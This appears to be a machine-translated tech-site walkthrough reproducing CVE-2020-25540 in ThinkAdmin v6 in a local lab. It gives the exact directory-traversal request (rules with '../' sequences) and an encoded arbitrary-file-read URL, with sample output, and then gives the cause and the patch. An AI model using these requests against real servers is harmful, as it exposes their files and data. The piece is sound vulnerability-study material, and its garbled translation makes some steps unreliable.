Shulou(Shulou.com)05/31 Report--

How to analyze the directory traversal file reading vulnerability CVE-2020-25540, I believe that many inexperienced people are at a loss about this. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

Environment building

Phpstudy2018+ThinkAdmin v6.0.3

ThinkAdmin version ≤ 2020.08.03.01

Https://github.com/zoujingli/ThinkAdmin/tree/a57c3a9373bc89f5eaa4142d047481a898b5757e

Composer command

\ 1. Install the Composer command, set PHP in phpstudy to version 7.1 or above, and place the corresponding folder in the environment variable path

\ 2. Open the php.ini file in the phpstudy server and find the semicolon before extension=php_openssl.dll, which means to open the ssl extension in order to access it in the cmd command.

\ 3. Install composer.phar, find the place to download the content, download the current latest version of composer.phar, double-click the installation, do not check

Download address https://getcomposer.org/Composer-Setup.exe

\ 4. Automatically selected after configuring the environment variable

And then go on to the next step, the installation is complete.

\ 5. After the installation is complete, type composer on the cmd command line to see if the installation is successful

\ 6. Set Ali Cloud Composer proxy

Due to the slow access to Composer in China, it is recommended to set up Ali Cloud Composer image and run the following command to set Ali Cloud proxy

Composer config-g repo.packagist composer https://mirrors.aliyun.com/composer

\ 7. Search and download the vulnerable version of ThinkAdminV6 locally

\ 8. Go to the ThinkAdmin directory to install

Composer install

\ 9. Then modify the configuration file in the config/database.php directory. You need to create a database

Modify the account password root/root used to connect to the database

Import database

To import the admin_v6.sql file from the thinkadmin installation package into the database

Quickly create a new database

Database name: admin_v6

Common source commands

Go to the mysql database console

Such as mysql-u root-p

Mysql > use database

Then use the source command, followed by a script file (such as .sql used here)

Mysql > source d:wcnc_db.sql

Successfully imported

\ 10. Php to run php think run

Http://ip:8000 opens the page

Loophole recurrence

Directory traversal / arbitrary file reading

Directory traversal

It can be constructed directly in the browser, or it can be grabbed and changed by burp.

① uses burp to grab the first page of the packet, and sends it to the Repeater module to construct the packet acquisition directory.

② adds? s=admin/api.Update/node after modifying GET to POST,url in the Repeater module

Enter rules=%5b%22%2f%22%5d / / rules= ["/"] below

When ③ clicks "Send" to send, you can see that there is a directory list in the return package.

Note: the list was not returned because it was not the first time the page was loaded when the package was grabbed, and the Content-Type field was replaced with Cache-Control, although 200 but the list content was empty.

It is no problem to grab the package when the page is loaded for the first time.

Return the result

Rules= ["/"] traverses all files under E:\ phpstudy2018\ PHPTutorial\ WWW\ ThinkAdmin6

HTTP/1.1 200 OKHost: 192.168.80.111:8000Date: Mon, 30 Nov 2020 10:32:39 + 0800Connection: closeX-Powered-By: PHP/7.2.1Content-Type:application/json; charset=utf-8Set-Cookie: think_lang=zh-cn; path=/Set-Cookie: PHPSESSID=8a43a78b3ebd325158a78608ac57107a; path=/ {"code": 1, "info": "obtained file list successfully!" , "data": {"rules": ["\ /"], "ignore": [], "list": [{"name": "\ / admin_v6.sql", "hash": "a6add0e2aab0e7d45f1ef35ad7846c52"}, {"name": "\ / app\ / admin\ / controller\ / Auth.php", "hash": "9a254f39ccdb4e334d48a8596d4ced57"}, {"name": "\ / app\ / admin\ / controller\ / Config.php", "hash": "09a65b23959905b7ea511e61b75d9626"} {"name": "\ / app\ / admin\ / controller\ / Index.php", "hash": "da3736920e43b33e18e0ba72407c8588"}, {"name": "\ / app\ / admin\ / controller\ / Login.php", "hash": "c1820e476b786a793a48ff893bf8ed3c", {"name": "\ / app\ / admin\ / controller\ / Menu.php", "hash": "d278f7948bfbe005987c16d18d2f49cb"}, {"name": "\ / app\ / admin\ / controller\ / Oplog.php", "hash": "7340a732685f2d4e91c01b07aa3efc4d"} {"name": "\ / app\ / admin\ / controller\ / Queue.php", "hash": "88ca8b37cb205adbbf771878836366be"}, {"name": "\ / app\ / admin\ / controller\ / User.php", "hash": "52c893ed2f2390e6a46ca3d0fcee59da"}, {"name": "\ / app\ / admin\ / controller\ / api\ / Plugs.php", "hash": "db98179054e8fe3a051f97901ea9ff2b"}, / * omit 10,000 lines * / {"name": "\ / vendor\ / zoujingli\ / wechat-developer\ / composer.json" "hash": "7db3f4ea9c17c21174c665b22992e97a"}, {"name": "\ / vendor\ / zoujingli\ / wechat-developer\ / include.php", "hash": "1434ae58cf94166d7097fe29ba0d42da"}, {"name": "\ / vendor\ / zoujingli\ / wechat-developer\ / readme.md", "hash": "5dc2765147e9aff90a838578a1dd8083"}, {"name": "\ / startup instructions .txt", "hash": "263d4e9a08fbab5ac55e78cf537acb6f"}

Rules= [".. /"] traverses all files under E:\ phpstudy2018\ PHPTutorial\ WWW

Rules= [".. /.. /"] traverses all files under E:\ phpstudy2018\ PHPTutorial

Rules= [".. /"] traverses all files under E:\ phpstudy2018

Rules= [".. /"] traverses all files under E:\

If the content of directory traversal exceeds the limit, an error will be reported.

Arbitrary file reading

① reads under the root directory [startup instructions .txt]

② is using the encryption function to encrypt the file name, which will be used to transfer parameters later.

Running on a virtual machine

Online operation

5i6s524v5s6j5y4q1a383c38

③ can read the contents of the file by visiting the link below

Http://192.168.80.111:8000/admin.html?s=admin/api.Update/get/encode/5i6s524v5s6j5y4q1a383c38

Base64 decrypts the contents of the file

Cause of loophole

Caused by the lack of authorization of the function methods in the Update.php file

Repair mode

1. Upgrade to version after 2020.08.03.01

two。 Use the official temporary repair plan

Https://github.com/zoujingli/ThinkAdmin/issues/244

After reading the above, do you know how to analyze the directory traversal file read vulnerability CVE-2020-25540? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.